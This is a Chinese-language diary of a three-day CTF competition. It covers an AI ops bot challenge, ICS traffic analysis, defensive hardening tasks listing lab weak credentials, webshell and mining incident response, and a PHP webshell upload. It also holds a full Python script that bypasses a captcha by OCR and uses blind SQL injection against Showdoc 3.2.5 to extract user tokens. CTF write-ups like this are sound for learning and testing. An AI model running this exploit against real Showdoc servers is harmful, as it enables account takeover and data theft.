- 第一天
- AI大模型、承载核心网
AI 运维机器人萌萌哒,flag格式为 PCL{….}" 网络管理员主机通向无限可能 RPKI 让 IP 网路由交换更可信 IP 网是 5GC 业支系统的窗口 用户签约数据对 UDM 至关重要
首先直接问它是没有结果的
之后用dirsearch扫到了download
之后是一个pdf的文档
之后就一直坐牢
之后点击新对话有重大发现
是需要用户名和编号
之后在pdf文档里面找到了用户名编号
但是不对
原来有一个字母打错了!
就得到flag了,拿了两百分
总算知道平台一开始就提醒要多试Il1了
然后给了一个ssh链接地址嘛
SSH-10.1.1.230 player / tY9*tU5$gZ1/rJ8;uH
就一直在那里试,但没什么发现就直接下一道题目了
水厂工控
请根据给出的流量包,并渗透水厂,获取相应Flag。 水厂地址:192.168 .200.4
流量分析题没有做出来,但结束之后,有队伍说
flag{SOS}
这个就是一部分的flag,签到题,emmmm......绝
协同攻击
之后就一直坐牢,下午5点钟,协同开始
之后用fscan扫到了一些
一个登录框
admin
123456
就直接进去了。。。。。。
之后就交上去了
但是没过,要截图
之后就过了
不过只有协同基础分,没有加在实际的分上
绝。。。。。。
之后就坐牢,第一天就结束了
第二天
工业固件
打开这个文件
wifi密码
防御
本场景靶标地址统一为:10.161.26.100
Tomcat服务存在弱口令:tomcat/tomcat,请将tomcat的密码改为:T0mCat-1122.0。
端口:2121(ssh)、2180,ssh信息:ctf/123456
A公司新上线一台服务器,请你协助该公司识别服务器相关安全风险,并进行安全加固,通过后会在根目录生成flag。
端口:2222(web访问ssh)、2221、2279,ssh信息:ctf/ctf
A公司服务器被攻击者入侵并进行了维权,请你处置该事件,处置通过后会在根目录生成flag。
端口:2322(web访问ssh),ssh信息:ctf/ctf
A公司服务器的系统文件被攻击者篡改,请你协助处置该事件,清除安全问题恢复服务正常,处置通过后会在根目录生成flag
端口:2422(web访问ssh),ssh信息:ctf/ctf
A企业发现其首页被黑并且敏感信息在暗网售卖,并立即开启应急程序,请对其官网服务器进行分析,找到存在的安全问题并立即加固,修复完全部的安全风险后会在根目录下获取flag。
端口:2522(ssh)、2580,ssh信息:ctf/123456
A公司在上一次被黑客入侵数据库后,及时修改了数据库密码,但是却导致Web服务出现故障,请你协助进行故障处理,处置通过后会在根目录生成flag
端口:2622(web访问ssh),ssh信息:ctf/ctf
A公司新上线一台文件存储服务器,但是似乎没有做好文件控制,产生了一些安全隐患,请进行漏洞修复与加固,修复通过后会在根目录生成flag
端口:2722(web访问ssh),ssh信息:ctf/ctf
sz命令可以下载文件,rz命令可以上传文件,执行 sudo /restart-web.sh 命令重启服务"
A公司的业务系统收到了攻击并被植入了webshell,请进行应急排查,找到webshell的path和密码,答案格式为flag{path_pass}。端口:2822(ssh)、2880,ssh信息:ctf/123456
端口:2822(ssh)、2880,ssh信息:ctf/123456
A公司的业务系统意外暴露在互联网,受到了黑客的攻击,请对系统进行应急排查,找到攻击者留下的攻击痕迹,答案为攻击者进行攻击遗留的关键文件的md5值(md5sum)。
端口:2922(ssh)、2848,ssh信息:ctf/123456
A企业的一台生产服务器被黑客攻击了,并植入了勒索病毒,现在请进行应急排查,恢复生产业务并找出攻击者的线索。
端口:2022(ssh),ssh信息:root/123456
1. 请恢复生产业务正常,恢复后请分析业务找到业务关键信息,即为答案。
2. 请进行应急分析找出攻击者的远控服务器域名,即为答案(例如flag{a.com})。
3. 请分析日志,找出攻击者攻陷服务器所利用的服务(例如flag{服务名})。"
当时是队友解决了第一题,拿了100分
Tomcat服务存在弱口令:tomcat/tomcat,请将tomcat的密码改为:T0mCat-1122.0。
端口:2121(ssh)、2180,ssh信息:ctf/123456
请分析日志,找出攻击者攻陷服务器所利用的服务(例如flag{服务名})。"
当时查看日志找到了这道题目
flag{ssh},拿到100分
工业流量分析
当时拿了200分。
之后扫到这个网页
下载工程文件
伪加密
解压之后010打开演示文件
得到flag,拿了200分
之后第二天的比赛就结束了
第三天
第三天打开排名一看少了200分,后来公告说防御题的分数单独算......
应急响应
这个也是单独计算分数
当时搞了一个vpn才可以访问这道题目
这题其实是队友解出来的
这题找到挖矿地址
xmrs1.pool.cn.com
智慧文档
登录框需要绕验证码
脚本
import argparse
import ddddocr
import requests
import onnxruntime
from urllib.parse import urljoin
onnxruntime.set_default_logger_severity(3)
table = '0123456789abcdef'
proxies = {'http': 'http://127.0.0.1:8085'}
ocr = ddddocr.DdddOcr()
ocr.set_ranges(table)
class RetryException(Exception):
pass
def retry_when_failed(func):
def retry_func(*args, **kwargs):
while True:
try:
return func(*args, **kwargs)
except RetryException:
continue
except Exception as e:
raise e
return retry_func
def generate_captcha(base: str):
data = requests.get(f"{base}?s=/api/common/createCaptcha").json()
captcha_id = data['data']['captcha_id']
response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}')
data = response.content
result = ocr.classification(data)
return captcha_id, result
@retry_when_failed
def exploit_one(base: str, current: str, ch: str) -> str:
captcha_id, captcha_text = generate_captcha(base)
data = requests.get(base, params={
's': '/api/item/pwd',
'page_id': '0',
'password': '1',
'captcha_id': captcha_id,
'captcha': captcha_text,
'item_id': f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "
}).json()
if data['error_code'] == 0:
return ch
elif data['error_code'] == 10010:
return ''
elif data['error_code'] == 10206:
raise RetryException()
else:
print(f'error: {data!r}')
raise Exception('unknown exception')
def main():
parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
parser.add_argument('-u', '--url', type=str, required=True)
args = parser.parse_args()
target = urljoin(args.url, '/server/index.php')
res = ''
for i in range(64):
r = ''
for ch in list(table):
r = exploit_one(target, res, ch)
if r:
res += ch
break
print(f'Current result: {res}')
if not r:
break
if __name__ == '__main__':
main()
拿了200分
风力发电
fscan扫了一下
可以上传php文件
上传了一个马,拿到flag,得了100分
然后上传的报告得到了50分
之后就坐牢,就结束了